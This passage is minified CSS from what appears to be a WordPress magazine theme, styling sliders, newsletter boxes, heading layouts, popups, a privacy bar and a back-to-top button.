.scroll-holder::-webkit-scrollbar-corner { -webkit-border-radius: var(--round-7); border-radius: var(--round-7); background-color: var(--flex-gray-15); } .swiper-wrapper .p-wrap { margin-bottom: 0; } .slider-footer { display: flex; align-items: center; justify-content: center; margin-top: 10px; } .slider-footer > * { display: inline-flex; align-items: center; min-height: 10px; padding: 0 4px; color: var(--slider-nav-color, inherit); } .slider-footer .rbi { font-size: 18px; -webkit-transition: var(--effect); transition: var(--effect); } .post-slider .slider-prev, .post-slider .slider-next { font-size: 1.75rem; position: absolute; z-index: 10; top: 50%; right: 0; left: auto; display: flex; align-items: center; justify-content: center; width: 60px; height: 60px; margin-top: -30px; -webkit-transition: var(--effect); transition: var(--effect); color: var(--absolute-white); } .post-slider .slider-next { right: auto; left: 0; } .post-slider .slider-prev:hover, .post-slider .slider-next:hover { color: var(--g-color); } .slider-footer .rbi:hover { color: var(--g-color); } .block-hrc .p-wrap:first-child { margin-bottom: calc(var(--bottom-spacing) * .5); padding-bottom: calc(var(--bottom-spacing) * .5); border-bottom: 1px solid var(--flex-gray-15); --bottom-spacing: 20px; } .hrc-3 .sub-section { margin-top: calc(var(--bottom-spacing) * .5); padding-top: calc(var(--bottom-spacing) * .5); border-top: 1px solid var(--flex-gray-20); --bottom-spacing: 20px; } .hrc-holder { display: flex; align-items: flex-start; flex-flow: row nowrap; } .hrc-col .p-wrap { display: block; width: 100%; } .yt-playlist { overflow: hidden; align-items: stretch; border-radius: var(--round-7); } .iframe-holder { position: relative; display: block; overflow: hidden; width: 100%; height: 0; padding-bottom: 56.25%; background-color: var(--shadow-7); } .yt-playlist .iframe-holder { background-color: var(--dark-accent); } .iframe-holder iframe { position: absolute; top: 0; right: 0; bottom: 0; left: 0; display: block; width: 100%; height: 100%; } .plist-items-inner { position: relative; height: 100%; background-color: var(--dark-accent); } .plist-holder { position: absolute; top: 0; right: 0; overflow-x: hidden; overflow-y: auto; width: 100%; height: 100%; padding-top: 80px; } .plist-item { display: flex; flex-flow: row nowrap; width: 100%; padding: 10px 20px; } .plist-item:hover { background-color: var(--shadow-7); } .plist-item-thumb { flex-shrink: 0; width: 90px; margin-left: 12px; } span.plist-item-title { line-height: 1.5; display: block; } .play-panel { position: absolute; z-index: 99; top: 0; right: 0; left: 0; display: flex; align-items: stretch; flex-flow: row nowrap; background-color: var(--dark-accent); box-shadow: 0 4px 10px var(--shadow-7); } .yt-trigger { position: relative; display: flex; flex-grow: 0; flex-shrink: 0; width: 70px; margin-right: auto; margin-left: 0; cursor: pointer; -webkit-transition: var(--effect); transition: var(--effect); background-color: var(--g-color); } .yt-trigger:hover { -webkit-box-shadow: 0 0 20px var(--g-color-90); box-shadow: 0 0 20px var(--g-color-90); } .yt-trigger-icons { position: relative; display: flex; align-items: center; justify-content: center; width: 100%; height: 100%; cursor: pointer; } .yt-trigger-icons svg { position: absolute; width: 30px; } .play-content { position: relative; overflow: hidden; flex-grow: 1; padding: 10px 12px; } .play-index { display: flex; margin-bottom: 7px; opacity: .5; } .index-info { margin-right: auto; } .play-title { display: block; overflow: hidden; width: 100%; white-space: nowrap; text-overflow: ellipsis; } .yt-trigger-icons .svg-pause, .is-playing .yt-trigger-icons .svg-play { display: none; } .is-playing .yt-trigger-icons .svg-pause { display: block; } .plist-meta { display: block; margin-top: 5px; opacity: .5; } .block-qlinks .block-inner { display: flex; align-items: center; flex-flow: row nowrap; } .qlinks-header { line-height: 0; flex-grow: 0; flex-shrink: 0; } .qlinks-layout-2 .qlinks-header { margin-left: 5px; } .qlinks-content { display: flex; flex-grow: 1; list-style: none; } .qlinks-content ul { display: flex; flex-flow: row nowrap; width: 100%; list-style: none; } .qlink a, .qlinks-heading { font-size: var(--rem-mini); } .qlinks-layout-1 .qlinks-heading { line-height: 1.15; color: var(--g-color); } .qlink a { position: relative; display: block; margin-left: 1px; padding: 4px 7px; -webkit-transition: var(--effect); transition: var(--effect); white-space: nowrap; } .qlinks-layout-1 .qlink a { line-height: 1.15; padding-top: 0; padding-bottom: 0; text-decoration-line: underline; text-decoration-color: transparent; } .qlinks-layout-1 .qlink a:hover { text-decoration: underline; text-decoration-color: var(--g-color); } .qlinks-layout-1 .qlink a:after { position: absolute; top: 4px; bottom: 4px; left: -1px; display: block; content: ''; border-right: 1px solid var(--flex-gray-20); } .qlinks-layout-2 .qlink a { line-height: 1; margin: 2px 5px; border-radius: var(--round-3); background-color: var(--flex-gray-7); } .archive-header .qlinks-layout-2 .qlink a { background-color: var(--flex-gray-15); } .qlinks-layout-2 .qlink a:hover { color: var(--absolute-white); background-color: var(--g-color); -webkit-box-shadow: 0 0 10px var(--g-color-90); box-shadow: 0 0 10px var(--g-color-90); } .qlink:last-child > a, .qlinks-layout-2 .qlink:last-child > a { margin-left: 0; } .qlinks-layout-1 .qlink:last-child > a:after { display: none; } .breaking-news-heading { font-size: var(--em-mini); display: flex; align-items: center; margin-left: 10px; padding: 0 10px; white-space: nowrap; border-radius: var(--round-5); background-color: var(--solid-white); box-shadow: 0 2px 10px var(--shadow-7); } .breaking-news-heading svg { width: 1em; margin-left: 4px; color: var(--g-color); } .breaking-news-prev { display: none; } .block-breaking-news { display: flex; flex-flow: row nowrap; } .breaking-news-slider .swiper-slide { padding-left: 50px; } .breaking-news-title.entry-title { display: flex; align-items: center; height: 100%; margin-bottom: 0; -webkit-transition: opacity .5s var(--timing); transition: opacity .5s var(--timing); -webkit-transition-delay: .2ms; transition-delay: .2s; opacity: 0; } .breaking-news-title.entry-title a { line-height: 1.7; display: inline-block; overflow: hidden; max-width: 100%; margin-bottom: 0; white-space: nowrap; text-overflow: ellipsis; } .swiper-slide-active .breaking-news-title.entry-title { opacity: 1 } .breaking-news-nav { font-size: 11px; position: absolute; z-index: 10; top: 0; bottom: 0; left: 0; display: flex; align-items: center; justify-content: space-around; width: 42px; height: 100%; } .breaking-news-nav > * { line-height: 1; cursor: pointer; -webkit-transition: var(--effect); transition: var(--effect); opacity: .3; } .breaking-news-nav > *:hover { opacity: 1; color: var(--g-color); } .newsletter-box { overflow: hidden; border-radius: var(--round-7); background-repeat: no-repeat; background-position: center; background-size: cover; } .newsletter-inner { display: flex; align-items: center; flex-flow: row wrap; padding: 20px; } .newsletter-box:not(.has-bg):not(.newsletter-box-2) { box-shadow: 0 0 30px var(--shadow-7); } .single .s-ct .newsletter-box { border: none; -webkit-box-shadow: none; box-shadow: none; } .newsletter-featured { flex: 0 0 15%; max-width: 15%; } .newsletter-box-2 .newsletter-featured { display: flex; justify-content: center; } .newsletter-content { flex: 0 0 30%; max-width: 30%; } .newsletter-inner > * { padding-right: 20px; padding-left: 20px; } .newsletter-form { flex: 0 0 55%; max-width: 55%; margin-right: auto; } .newsletter-form input[type='text'], .newsletter-form input[type='email'] { font-weight: 700; } .newsletter-form input[type='text']::placeholder, .newsletter-form input[type='email']::placeholder { font-weight: var(--input-fweight); } .newsletter-description { font-size: var(--rem-small); } .newsletter-content > *:not(:last-child) { margin-bottom: 10px; } .newsletter-box-2 .newsletter-inner { flex-flow: column nowrap; text-align: center; } .newsletter-box-2 .newsletter-inner > * { flex: 0 0 100%; width: 100%; max-width: 600px; margin-top: 0; margin-right: auto; margin-left: auto; } .newsletter-box-2 .newsletter-inner > *:not(:last-child) { margin-bottom: 20px; } .newsletter-box-2 .mc4wp-form-fields > * { justify-content: center; } .newsletter-sb-inner { padding: 20px; text-align: center; border: 2px dashed var(--flex-gray-15); } .newsletter-sb-inner > *:not(:last-child) { margin-bottom: 15px; } .newsletter-sb-featured img { margin-right: auto; margin-left: auto; } .newsletter-sb .mc4wp-form-fields > *:not(.agree-to-terms) { flex-flow: row wrap; justify-content: center; } .newsletter-sb .mc4wp-form-fields input[type='submit'] { margin-top: 15px; margin-right: 0; } .newsletter-sb .agree-to-terms { font-size: var(--meta-fsize); display: inline-block; margin-top: 20px; } .heading-inner { position: relative; display: flex; align-items: center; flex-flow: row nowrap; width: 100%; } .heading-layout-c1 .heading-inner, .heading-layout-c2 .heading-inner, .heading-layout-c6 .heading-inner, .heading-layout-c7 .heading-inner, .heading-layout-c9 .heading-inner, .heading-layout-c13 .heading-inner { justify-content: center; } .heading-title > * { position: relative; z-index: 1; color: var(--heading-color, inherit); } .heading-title a { -webkit-transition: var(--effect); transition: var(--effect); } .heading-title a:hover { opacity: .7; } .heading-tagline { line-height: 1; display: flex; align-items: center; flex-flow: row nowrap; margin-right: auto; color: var(--heading-tagline-color, inherit); } .heading-tagline a, .heading-tagline i { -webkit-transition: var(--effect); transition: var(--effect); } .heading-tagline a:hover, .heading-tagline a:hover + i { opacity: .7; } .heading-tagline-icon { margin-right: 4px; } [class *='heading-layout-c'] .heading-inner { flex-flow: row wrap; text-align: center; } [class *='heading-layout-c'] .heading-tagline { justify-content: center; width: 100%; margin-top: 12px; margin-left: auto; } .heading-layout-2 .heading-title:before, .heading-layout-c2 .heading-title:before, .heading-layout-c2 .heading-title:after { display: inline-flex; width: .6em; height: .6em; margin-left: 7px; content: ''; -webkit-border-radius: 100%; border-radius: 100%; background-color: var(--heading-sub-color, currentColor); } .heading-layout-c2 .heading-title:after { margin-right: 5px; margin-left: 0; } .heading-layout-3 .heading-inner, .heading-layout-c3 .heading-inner { border-bottom: 1px solid var(--flex-gray-15); } .heading-layout-c3 .heading-inner { padding-bottom: 15px; } .heading-layout-c3 .heading-inner:before { position: absolute; right: 50%; bottom: 0; width: 120px; margin-right: -60px; content: ''; border-bottom: 5px solid var(--heading-sub-color); } .heading-layout-c4 .heading-title, .heading-layout-c5 .heading-title { width: 100%; } .heading-layout-c3 .heading-title, .heading-layout-c4 .heading-title, .heading-layout-c5 .heading-title { text-align: center; } .heading-layout-3 .heading-title > * { display: inline-flex; padding-bottom: 10px; border-bottom: 5px solid var(--heading-sub-color); } .heading-layout-c3 .heading-title { width: 100%; } .heading-layout-4 .heading-inner, .heading-layout-c4 .heading-inner { padding-bottom: 10px; border-bottom: 4px solid var(--heading-sub-color, currentColor); } .heading-layout-4 .heading-inner:before, .heading-layout-c4 .heading-inner:before { position: absolute; top: auto; right: 0; bottom: 2px; left: 0; display: block; content: ''; border-bottom: 2px solid var(--heading-sub-color, currentColor); } .heading-layout-1 .heading-title, .heading-layout-c1 .heading-title, .heading-layout-6 .heading-title, .heading-layout-c6 .heading-title { line-height: 1; position: relative; display: inline-flex; padding: 0 12px; backface-visibility: hidden; } .heading-layout-1 .heading-title:after, .heading-layout-c1 .heading-title:after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; content: ''; -webkit-transform: skewX(15deg); transform: skewX(15deg); border-right: 3px solid var(--heading-sub-color); border-left: 3px solid var(--heading-sub-color); } .heading-layout-5 .heading-inner { width: 100%; padding-top: 7px; border-top: 5px solid var(--heading-sub-color); } .heading-layout-c5 .heading-inner { width: 100%; padding-top: 10px; border-top: 5px solid var(--heading-sub-color); } .heading-layout-6 .heading-title > *, .heading-layout-c6 .heading-title > *, .heading-layout-13 .heading-title > *, .heading-layout-c13 .heading-title > * { position: relative; z-index: 1; display: block; padding: 5px 20px; color: var(--absolute-white); } .heading-layout-6 .heading-title > *:after, .heading-layout-c6 .heading-title > *:after { position: absolute; z-index: -1; top: 0; right: 0; bottom: 0; left: 0; content: ''; -webkit-transform: skewX(20deg); transform: skewX(20deg); border-radius: var(--round-5); background-color: var(--heading-sub-color); } .heading-layout-13 .heading-title > *:after, .heading-layout-c13 .heading-title > *:after { position: absolute; z-index: -1; top: 0; right: 0; bottom: 0; left: 0; content: ''; border-radius: var(--round-5); background-color: var(--heading-sub-color); } .heading-layout-7 .heading-title > * { line-height: 1; display: inline-flex; padding-right: 7px; border-right: 7px solid var(--heading-sub-color); } .heading-layout-c7 .heading-title > *:before, .heading-layout-c7 .heading-title > *:after { display: inline-flex; width: 10px; height: 10px; margin-left: 10px; content: ''; background-color: var(--heading-sub-color); } .heading-layout-c7 .heading-title > *:after { margin-right: 10px; margin-left: 0; } .heading-layout-8 .heading-title > * { display: inline-flex; padding-right: 15px; } .heading-layout-8 .heading-title > *:before { position: absolute; z-index: -1; top: 0; right: 0; bottom: 0; display: block; width: 50%; content: ''; opacity: .5; background-color: var(--heading-sub-color, currentColor); } .heading-layout-c8 .heading-title { position: relative; display: inline-flex; margin-right: auto; margin-left: auto; } .heading-layout-c8 .heading-title:before, .heading-layout-c8 .heading-title:after { position: absolute; top: 50%; right: auto; left: calc(100% + 10px); width: 60px; height: 2px; margin-top: -1px; content: ''; background-color: var(--heading-sub-color, currentColor); } .heading-layout-c8 .heading-title:after { right: calc(100% + 10px); left: auto; } .heading-layout-9 .heading-title, .heading-layout-c9 .heading-title { position: relative; display: inline-flex; padding: 0 20px; } .heading-layout-9 .heading-title:before, .heading-layout-c9 .heading-title:before { position: absolute; top: 0; right: 0; bottom: auto; left: auto; width: 7px; height: 7px; content: ''; pointer-events: none; opacity: .5; border-top: 2px solid var(--heading-sub-color); border-right: 2px solid var(--heading-sub-color); } .heading-layout-9 .heading-title:after, .heading-layout-c9 .heading-title:after { position: absolute; top: auto; right: auto; bottom: 0; left: 0; width: 7px; height: 7px; content: ''; pointer-events: none; opacity: .5; border-bottom: 2px solid var(--heading-sub-color); border-left: 2px solid var(--heading-sub-color); } .heading-layout-c10 .heading-title, .heading-layout-c11 .heading-title { display: flex; justify-content: center; width: 100%; } .heading-layout-11 .heading-tagline, .heading-layout-c11 .heading-tagline { font-size: 3em; line-height: 1; position: absolute; top: auto; right: 0; bottom: -7px; margin: 0; pointer-events: none; opacity: .12; } .heading-layout-12 .heading-title, .heading-layout-c12 .heading-title { display: flex; align-items: center; flex-flow: row nowrap; } .heading-layout-12 .heading-title > *:before, .heading-layout-c12 .heading-title > *:before { line-height: 1; display: inline-flex; width: 1em; height: .6em; margin-left: 7px; content: ''; background-color: var(--heading-sub-color); } .heading-layout-c12 .heading-title { margin-right: auto; margin-left: auto; } .heading-layout-c12 .heading-title > *:after { line-height: 1; display: inline-flex; width: 1em; height: .6em; margin-right: 7px; content: ''; background-color: var(--heading-sub-color); } .heading-layout-12 .heading-inner, .heading-layout-c12 .heading-inner { width: 100%; padding-bottom: 7px; border-bottom: 5px solid var(--heading-color); } .heading-layout-c12 .heading-inner { padding-bottom: 12px; } /** footer slide up */ .f-slideup { position: fixed; z-index: 500; right: 0; bottom: 0; left: 0; -webkit-transition: -webkit-transform .4s var(--timing); transition: transform .4s var(--timing); -webkit-transform: translate3d(0, 100%, 0); transform: translate3d(0, 100%, 0); will-change: transform; } .yes-f-slideup .f-slideup { -webkit-transform: translate3d(0, 0, 0); transform: translate3d(0, 0, 0); } .slideup-inner { position: relative; -webkit-transition: opacity .4s var(--timing); transition: opacity .4s var(--timing); pointer-events: none; opacity: 0; background-color: var(--slideup-bg, #88888888); } .slideup-toggle { position: absolute; top: auto; right: auto; bottom: 100%; left: 10%; display: block; padding: 3px 15px; -webkit-transition: var(--effect); transition: var(--effect); color: var(--slideup-icon-na-color, var(--absolute-white)); border-top-left-radius: var(--round-5); border-top-right-radius: var(--round-5); background-color: var(--slideup-icon-na-bg, var(--g-color)); } body:not(.yes-f-slideup) .slideup-toggle:hover { box-shadow: 0 0 10px var(--slideup-icon-na-bg-90, var(--g-color-90)); webkit-box-shadow: 0 0 10px var(--slideup-icon-na-bg-90, var(--g-color-90)); } .yes-f-slideup .slideup-toggle { color: var(--slideup-icon-color, #fff); background-color: var(--slideup-bg, #88888888); } .slideup-toggle i { line-height: 1; display: block; -webkit-transition: var(--effect); transition: var(--effect); } .yes-f-slideup .slideup-toggle:hover i { -webkit-transform: rotate(-180deg); transform: rotate(-180deg); } .yes-f-slideup .slideup-inner { visibility: visible; pointer-events: auto; opacity: 1; } /** blocks */ .block-list-small-1 .scroll-holder { max-height: 410px; padding-left: 15px; } .cbox { position: relative; margin-bottom: var(--bottom-spacing); } .cbox-inner { position: relative; display: block; overflow: hidden; -webkit-transition: var(--effect); transition: var(--effect); border-radius: var(--wrap-border, var(--round-7)); background-color: var(--flex-gray-7); } .cbox-inner:hover { -webkit-box-shadow: 0 4px 10px var(--shadow-7); box-shadow: 0 4px 10px var(--shadow-7); } .cbox-body { position: relative; z-index: 10; display: flex; align-items: center; flex-flow: row nowrap; flex-grow: 1; padding: 10px 15px; } .cbox-body > * { pointer-events: auto; } .cbox-2 .cbox-body:before { position: absolute; z-index: -1; top: -30px; right: 0; bottom: 0; left: 0; content: ''; pointer-events: none; background-image: -webkit-linear-gradient(top, rgba(0, 0, 0, 0), var(--cbox-bg, var(--g-color-90))); background-image: linear-gradient(to bottom, rgba(0, 0, 0, 0) 0%, var(--cbox-bg, var(--g-color-90)) 100%); } .no-gradient .cbox-2 .cbox-body:before { background-image: -webkit-linear-gradient(top, rgba(0, 0, 0, 0), rgba(0, 0, 0, .9)); background-image: linear-gradient(to bottom, rgba(0, 0, 0, 0) 0%, rgba(0, 0, 0, .9) 100%); } .follow-button { font-size: 12px; display: flex; align-items: center; flex-shrink: 0; justify-content: center; width: 34px; height: 34px; -webkit-transition: var(--effect); transition: var(--effect); border: 1px solid var(--flex-gray-15); border-radius: 100%; } .follow-trigger:hover, .follow-trigger.followed { color: #62b088; border-color: #62b088; } .follow-trigger.in-progress { -webkit-transform-origin: center; transform-origin: center; -webkit-animation: reaction-spinner 1s linear infinite; animation: reaction-spinner 1s linear infinite; pointer-events: none; } .follow-trigger.in-progress i:before { content: '\e942'; } .follow-icon, .followed-icon { line-height: 32px; width: 100%; height: 100%; text-align: center; } .followed-icon, .followed i:not(.followed-icon) { display: none; } .followed i.followed-icon { display: block; } .cbox-content { flex-grow: 1; } .cbox-count { display: block; } .cbox-2 .cbox-count, .cbox-3 .cbox-count { color: var(--absolute-white); } .cbox-content > *:not(:last-child) { margin-bottom: 5px; } .cbox-featured, .cbox-featured-overlay { position: relative; display: block; overflow: hidden; width: 100%; padding-bottom: 66.67%; } .featured-category-img { position: absolute; z-index: 1; top: 0; right: 0; bottom: 0; left: 0; display: block; } .featured-category-img img { position: relative; display: block; width: 100%; height: 100%; object-fit: cover; -webkit-object-fit: cover; } .is-gap-none .cbox-title, .is-gap-none .cbox-count { padding-right: 10px; padding-left: 10px; } .cbox-follow .cbox-inner { display: flex; height: 100%; } .follow-redirect { display: flex; align-items: center; flex-flow: column nowrap; justify-content: center; width: 100%; height: 100%; } .cbox-center { margin-top: 5px; -webkit-transition: var(--effect); transition: var(--effect); -webkit-transform: translate3d(0, 15px, 0); transform: translate3d(0, 15px, 0); pointer-events: none; opacity: 0; } .cbox:hover .cbox-center { -webkit-transform: translate3d(0, 0, 0); transform: translate3d(0, 0, 0); opacity: 1; } .hover-ani-1 .cbox-overlay .p-url:hover { text-decoration-color: var(--absolute-white); } .is-light.follow-button { color: var(--absolute-white); border-color: var(--absolute-white); } .is-light.follow-button:hover { opacity: .5; color: var(--absolute-white); border-color: var(--absolute-white); } .cbox-3 .cbox-overlay:before { position: absolute; z-index: -1; top: 0; right: 0; bottom: 0; left: 0; width: 100%; height: 100%; content: ''; pointer-events: none; opacity: .6; background-color: var(--cbox-bg, var(--g-color)); } .no-gradient .cbox-3 .cbox-overlay:before { background-color: rgba(0, 0, 0, .6); } .cbox-3 .cbox-body { align-items: flex-start; flex-flow: column nowrap; justify-content: space-between; width: 100%; height: 100%; padding: 20px; } .cbox-3 .cbox-body > * { width: 100%; } .cbox-3 .follow-button { margin-right: auto; } .cbox-4 .cbox-featured { padding-bottom: 100%; } .cbox-4 .follow-button { position: absolute; z-index: 10; top: 20px; left: 20px; } .cbox-4 .cbox-content { text-align: center; } .cbox-4 .cbox-body { padding: 25px 20px; } .cbox-5 { text-align: center; --bottom-spacing: 12px; } .cbox-5 .cbox-inner { background-color: transparent; } .cbox-5 .cbox-inner:hover { display: none; } .cbox-featured-holder { position: relative; margin-right: auto; margin-left: auto; } .cbox-5 .cbox-featured { overflow: hidden; width: 100%; padding-bottom: 100%; -webkit-border-radius: 100%; border-radius: 100%; } .cbox-5 > *:not(:last-child) { margin-bottom: var(--bottom-spacing); } .cbox-featured-holder .follow-button { position: absolute; z-index: 1; top: 50%; right: 50%; display: inline-flex; margin-top: -17px; margin-right: -17px; text-shadow: -1px 2px 7px var(--flex-gray-15); } .block-covid-data { position: relative; } .block-covid-data svg.svg-virus { position: absolute; top: 0; left: 0; display: block; width: 70px; opacity: .07; } [data-theme='dark'] .block-covid-data svg, .light-scheme .block-covid-data svg { fill: #fff; } .block-covid-data .description-text { line-height: 1; display: flex; align-items: center; flex-flow: row nowrap; } .country-name { display: flex; margin-bottom: 15px; } .data-item { display: flex; align-items: center; width: 100%; } .data-item:not(:last-child) { margin-bottom: 7px; } .data-item-icon { margin-left: 7px; } .data-item svg { width: 1em; } .data-item-value { margin-right: auto; margin-left: 0; } .data-death .data-item-value { color: var(--g-color); } .ad-wrap, .amp-ad-wrap { line-height: 1; display: block; text-align: center; } .header-amp-ad, .footer-amp-ad { padding: 10px 20px; } .header-amp-ad { background-color: var(--flex-gray-15); } .ad-image { line-height: 0; display: inline-block; overflow: hidden; border-radius: var(--round-5); } .ad-description { line-height: 1; display: block; margin-bottom: 10px; text-align: center; } .block-h .heading-title { line-height: 1; margin-bottom: 0; } .heading-title i { margin-left: 5px; } .related-sec { display: block; width: 100%; padding: 20px; border-radius: var(--round-5); box-shadow: 0 5px 30px var(--shadow-7); } .entry-top .widget:not(:last-child), .entry-bottom .widget:not(:last-child) { margin-bottom: 35px; } .related-sec .block-h, .entry-widget .block-h { margin-bottom: 25px; } .related-sec .p-list-small-2 { align-items: center; margin-bottom: 20px; } .related-sec .p-list-small-2 .feat-holder { width: 100px; } .related-1 .p-list-small-2 { margin-bottom: 15px; padding-bottom: 15px; border-bottom: 1px solid var(--flex-gray-15); } .related-1 .p-list-inline:not(:last-child) { margin-bottom: 7px; padding-bottom: 7px; border-bottom: 1px solid var(--flex-gray-15) } .related-5 .p-wrap:not(:last-child) { margin-bottom: 12px; } .related-4 .p-wrap:not(:last-child) { margin-bottom: 5px; padding-bottom: 5px; border-bottom: 1px solid var(--flex-gray-15); } .entry-widget:not(:last-child) { margin-bottom: 30px; } .widget.entry-widget .related-sec { padding: 0; -webkit-box-shadow: none; box-shadow: none; } .privacy-bar { display: none; transition: opacity .25s var(--timing); -webkit-transform: opacity .25s var(--timing); opacity: 0; } .privacy-bar.activated { display: block; opacity: 1; } .privacy-bar.privacy-bottom { position: fixed; z-index: 970; right: 0; bottom: 10px; align-items: center; width: 100%; padding-right: 15px; padding-left: 15px; pointer-events: none; } .privacy-bar.privacy-left { position: fixed; z-index: 9999; top: auto; right: 20px; bottom: 20px; width: 380px; } .privacy-inner { font-size: var(--rem-mini); position: relative; display: flex; overflow: hidden; align-items: center; flex-flow: row nowrap; padding: 7px 20px; pointer-events: auto; color: var(--privacy-color); border-radius: var(--round-5); background-color: var(--privacy-bg-color, var(--dark-accent)); -webkit-box-shadow: 0 5px 15px var(--shadow-12); box-shadow: 0 5px 15px var(--shadow-12); } .privacy-bar.privacy-top { background-color: var(--privacy-bg-color, var(--dark-accent)); } .privacy-bar.privacy-top .privacy-inner { max-width: 1270px; margin-right: auto; margin-left: auto; background-color: transparent; -webkit-box-shadow: none; box-shadow: none; } .privacy-bar.privacy-left .privacy-inner { border-radius: var(--round-7); } .privacy-bar.privacy-bottom .privacy-inner { max-width: 720px; margin-right: auto; margin-left: auto; padding: 12px; } .privacy-content { flex-grow: 1; } .privacy-dismiss-btn { line-height: 1; display: flex; flex-shrink: 0; margin-right: 20px; padding: 5px 15px; } .privacy-bar.privacy-top .privacy-dismiss-btn:not(:hover):not(:focus) { background: var(--absolute-dark); } .privacy-dismiss-btn span { font-size: var(--em-mini); } .privacy-left .privacy-inner { margin-right: 0; margin-left: 0; padding: 15px; -webkit-box-shadow: 0 4px 30px var(--shadow-12); box-shadow: 0 4px 30px var(--shadow-12); } .privacy-inner a:not(.is-btn) { font-weight: 700; transition: var(--effect); -webkit-transform: var(--effect); color: inherit; text-decoration-line: underline; text-decoration-style: dotted; text-decoration-thickness: 1px; } .privacy-inner a:not(.is-btn):hover { color: var(--g-color); } .privacy-bar.privacy-left .privacy-dismiss-btn { padding: 10px 20px; } .saved-section { display: block; } .bookmark-section-header { position: relative; display: flex; align-items: center; flex-flow: row nowrap; } .saved-section .bookmark-section-header { padding-top: 25px; padding-bottom: 25px; } .blog-wrap.saved-content { margin-top: 0; } .bookmark-section-header-inner { position: relative; flex-grow: 1; } .bookmark-section-header-image { align-items: center; flex-shrink: 0; width: auto; height: 40px; margin-bottom: 10px; } .bookmark-section-header-image img { width: auto; max-height: 100%; } .bookmark-section-title, .bookmark-section-decs { display: block; } .bookmark-section-decs { margin-top: 5px; } .p-wrap.removing { display: none; } .empty-saved { margin-top: 25px; margin-bottom: 25px; } .empty-saved-desc { font-size: var(--rem-small); display: block; max-width: 500px; margin-top: 7px; } .interest-section .bookmark-section-header { padding: 20px 0; } .empty-saved-desc i { display: inline; color: var(--g-color); } .interest-content { margin-bottom: 30px; } .rec-section { display: block; overflow: hidden; background-color: var(--dark-accent); } .logo-popup-outer { display: flex; width: 100%; padding: 40px; pointer-events: auto; -webkit-border-radius: 10px; border-radius: 10px; background: var(--solid-white); -webkit-box-shadow: 0 10px 30px var(--shadow-12); box-shadow: 0 10px 30px var(--shadow-12); } [data-theme='dark'] .logo-popup-outer { background-color: var(--dark-accent); } .rb-user-popup-form { position: relative; max-width: 350px; margin: auto; } .logo-popup { width: 100%; } .login-popup-header { position: relative; display: block; margin-bottom: 25px; padding-bottom: 20px; text-align: center; } .login-popup-header:after { position: absolute; right: 50%; bottom: 0; display: block; width: 30px; margin-right: -15px; content: ''; border-bottom: 6px dotted var(--g-color); } .logo-popup-logo { display: flex; justify-content: center; width: auto; max-height: 80px; margin-bottom: 20px; } .logo-popup-logo img { display: block; object-fit: contain; } .user-form label { line-height: 1; display: block; margin-bottom: 10px; } .user-form form > *:not(:last-child) { margin-bottom: 15px; } .user-form input[type='text'], .user-form input[type='password'] { display: block; width: 100%; border-radius: var(--round-7); } .user-form .login-submit { padding-top: 7px; } .user-form input[type='submit'] { width: 100%; } .user-form-footer { line-height: 1; display: flex; flex-flow: row nowrap; justify-content: center; margin-top: 15px; } .user-form-footer a { -webkit-transition: var(--effect); transition: var(--effect); opacity: .7; } .user-form-footer > *:not(:last-child) { margin-left: 7px; padding-left: 7px; border-left: 1px solid var(--flex-gray-15); } .user-form-footer a:hover { text-decoration: underline; opacity: 1; color: var(--body-fcolor); text-decoration-color: var(--g-color); } .popup-newsletter { position: relative; width: 100%; max-width: 760px; margin: auto; } .popup-newsletter-inner { display: flex; overflow: hidden; flex-flow: row nowrap; width: 100%; border-radius: var(--round-7); -webkit-box-shadow: 0 10px 30px var(--shadow-12); box-shadow: 0 10px 30px var(--shadow-12); } .popup-newsletter-cover { display: flex; flex-shrink: 0; width: 40%; } .popup-newsletter-header > *:not(:first-child):not(.popup-newsletter-icon) { margin-top: 15px; } .popup-newsletter-cover-holder { position: relative; display: block; width: 100%; padding-bottom: 135%; background-color: var(--flex-gray-7); } .popup-newsletter .popup-newsletter-img { position: absolute; top: 0; right: 0; bottom: 0; left: 0; width: 100%; height: 100%; object-fit: cover; } .popup-newsletter-content { display: flex; flex-flow: column nowrap; flex-grow: 1; justify-content: space-evenly; padding: 40px; background-color: var(--dark-accent); } .popup-newsletter-content > * { position: relative; padding-top: 10px; padding-bottom: 10px; } .popup-newsletter-icon { position: absolute; top: 10px; left: 20px; pointer-events: none; opacity: .2; } .popup-newsletter-icon svg { width: 52px; } .popup-newsletter-description { font-size: var(--rem-small); color: var(--meta-fcolor); } .popup-newsletter-inner .mc4wp-form-fields input[type='submit'] { padding-right: 15px; padding-left: 15px; } .popup-newsletter-footer > * { opacity: .7; } .popup-newsletter-footer a { -webkit-transition: var(--effect); transform: var(--effect); } .popup-newsletter-footer a:hover { text-decoration: underline; opacity: 1; color: var(--body-fcolor); text-decoration-color: var(--g-color); } .close-popup-btn { padding: 0; cursor: pointer; background: none; box-shadow: none; touch-action: manipulation; } .close-icon { position: relative; display: block; overflow: hidden; width: 40px; height: 40px; pointer-events: none; } .close-icon:before, .close-icon:after { position: absolute; top: calc(50% - 1px); right: 30%; display: block; width: 40%; height: 2px; content: ''; -webkit-transition: var(--effect); transition: var(--effect); transform-origin: center center; opacity: .7; border-radius: 2px; background-color: currentColor; } .privacy-dismiss-btn:hover .close-icon:before, .privacy-dismiss-btn:hover .close-icon:after, .close-popup-btn:hover .close-icon:before, .close-popup-btn:hover .close-icon:after { transform: rotate(0deg); opacity: 1; } .close-icon:before { transform: rotate(-45deg); } .close-icon:after { transform: rotate(45deg); } .close-popup-btn { position: absolute; z-index: 9999; top: 0; left: 0; } #back-top { position: fixed; z-index: 980; bottom: 20px; left: 20px; display: block; cursor: pointer; -webkit-transition: all .5s var(--timing); transition: all .5s var(--timing); -webkit-transform: translate3d(0, 20px, 0); transform: translate3d(0, 20px, 0); text-decoration: none; pointer-events: none; opacity: 0; border: none; will-change: transform; } #back-top.scroll-btn-visible { -webkit-transform: translate3d(0, 0, 0); transform: translate3d(0, 0, 0); pointer-events: auto; opacity: 1; } #back-top.scroll-btn-visible:hover { -webkit-transform: translate3d(0, -5px, 0); transform: translate3d(0, -5px, 0); } #back-top i { font-size: 18px; line-height: 40px; display: block; width: 40px; height: 40px; -webkit-transition: var(--effect); transition: var(--effect); text-align: center; color: #fff; border-radius: var(--round-3); background-color: var(--dark-accent); } #back-top:hover i { background-color: var(--g-color); -webkit-box-shadow: 0 4px 15px var(--g-color-90); box-shadow: 0 4px 15px var(--g-color-90); } .amp-back-top { font-size: 1.5rem; line-height: 44px; display: block; width: 120px; height: 44px; margin-right: auto; margin-bottom: 10px; margin-left: auto; 